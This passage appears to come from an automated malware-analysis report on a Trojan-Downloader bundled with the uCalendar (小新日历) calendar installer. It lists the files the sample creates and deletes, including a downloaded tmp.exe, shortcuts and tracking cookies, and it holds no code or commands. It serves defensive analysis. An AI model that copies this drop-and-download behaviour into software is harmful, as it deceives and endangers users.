%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TFPS7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-KJA02.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MTLQ9.tmp (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\a1[1].htm (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P6CRT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2J6MD.tmp (317 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5I6TG.tmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J8GQQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3DN0I.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-316BT.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BH7KA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G8JJ3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A9JQ8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S7KL5.tmp (555 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FGDDO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UMDHA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3C4AS.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFB1B.tmp (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J82M1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2NU3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OSOGC.tmp (399 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IUPL8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SAHIH.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IE9GS.tmp (7 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\小新日历\小新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SBNVG.tmp (13 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\小新日历\访问 小新日历 官网.url (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-QT79M.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CC08P.tmp (523 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NV4JR.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3SAPP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V00NQ.tmp (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G5L56.tmp (578 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-11QQC.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-97IOG.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0SJ8.tmp (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1PRVS.tmp (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJG3S.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RHLM.tmp (545 bytes)
%Documents and Settings%\All Users\Desktop\ÎäÒ×´«Ææ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8K221.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NMQV.tmp (511 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-76EL3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-77Q9F.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-THFVL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QI037.tmp (32054 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-453FH.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RSEVU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.msg (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GDLU4.tmp (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BUO0T.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4U9TL.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T8AV0.tmp (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HIP4A.tmp (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPKRV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NB26.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HAV0P.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NFLP.tmp (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S4UJK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ECGSQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BA97O.tmp (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-CR36B.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJ2MO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GGFP6.tmp (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9B6IC.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7SN9K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H81BC.tmp (871 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S0HP8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-UOMB9.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CQ2G0.tmp (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H454P.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNLME.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V0GI3.tmp (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6MUOK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K6A4L.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J3A1P.tmp (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R3ENI.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OT7F7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE59E.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N9TNV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F3GLM.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RPQTQ.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1BO97.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-EIJBG.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-224GL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16KT2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-457SG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0RAC9.tmp (379 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L9R13.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VC40Q.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-134QI.tmp (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-12F6F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EPU0G.tmp (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GR1F1.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J635K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-0RK1D.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0QAU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U8HBE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8CE4A.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-FG2A2.tmp (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LK4FU.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V625H.tmp (348 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-89JKG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-54RS6.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PVBA9.tmp (930 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-LQKHS.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-91HFL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7V3M5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RR67N.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D5SAM.tmp (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T93Q7.tmp (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2QH3K.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UEO5K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-412CP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3HB2E.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7AIGQ.tmp (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6C897.tmp (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2JDM2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RAN83.tmp (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-01GK7.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\tj_get (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NU9MK.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D7GKR.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G4QOL.tmp (423 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L2QRQ.tmp (998 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D9EF4.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJMC9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8SQ3K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ICSK7.tmp (442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B1VSJ.tmp (565 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H6UDG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-PL60I.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q5IHQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q9602.tmp (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6U4PP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3OV3S.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIQHK.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5OQO8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ARCFV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD23K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U58P4.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SFKB5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V4CEI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B3HA8.tmp (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (1434 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GNV8E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6FEFD.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-776D0.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-5H9QJ.tmp (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S6Q82.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16QRI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SLEVI.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ABKJC.tmp (956 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3B5UH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TVVUF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S26CD.tmp (479 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-CI790.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-94MCM.tmp (586 bytes)
%Documents and Settings%\All Users\Desktop\ Intener Hao123.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DASMI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8FIHU.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-Q84VT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PGQ9B.tmp (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OQ3T0.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99VDN.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-3G7MO.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CJ1R8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-U404O.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKH3C.tmp (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GQB0.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\webctrl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2FA4J.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6J672.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9UI34.tmp (248 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5B0J5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S95AA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IT5G9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K8C4N.tmp (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GH8V2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8O12A.tmp (822 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TMDND.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-D9BCS.tmp (97 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VJS7P.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NCEGP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VFH95.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MQF6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (2149 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPNA1.tmp (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NML75.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IBNEQ.tmp (18 bytes)
%Documents and Settings%\All Users\Desktop\小新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V509A.tmp (313 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-POHV2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4EA8J.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NICBF.tmp (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAK3A.tmp (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-394GB.tmp (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\小新日历\卸载 小新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G0SMU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\icon_9[1].gif (893 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CIVFE.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RERKV.tmp (530 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJF6C.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-C4IKR.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RK743.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7UBNI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3LIFE.tmp (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-598FD.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EEJC5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-41LLL.tmp (479 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\webctrl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\ItDownload_wex.dll (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\tj_get (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\info.iam (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\botva2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\CallbackCtrl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WSysInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WListViewEx.dll (0 bytes)

The process uCalendar.exe:1840 makes changes in the file system.


The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\htmlinset1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\PopBoxSmall[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FMTFilterinset[1].txt (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xxurl[1].htm (361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tmp[1].exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[3].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[4].php (749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\weather.dat (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\md5[1].txt (32 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (1450 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uiconfig.txt (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qian[1].htm (102 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\tmp.exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (624 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@down.xiaoxinrili[1].txt (224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[2].htm (488 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[3].php (751 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@count.xiaoxinrili[1].txt (206 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\uCalhtml[1].txt (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[2].php (1177 bytes)
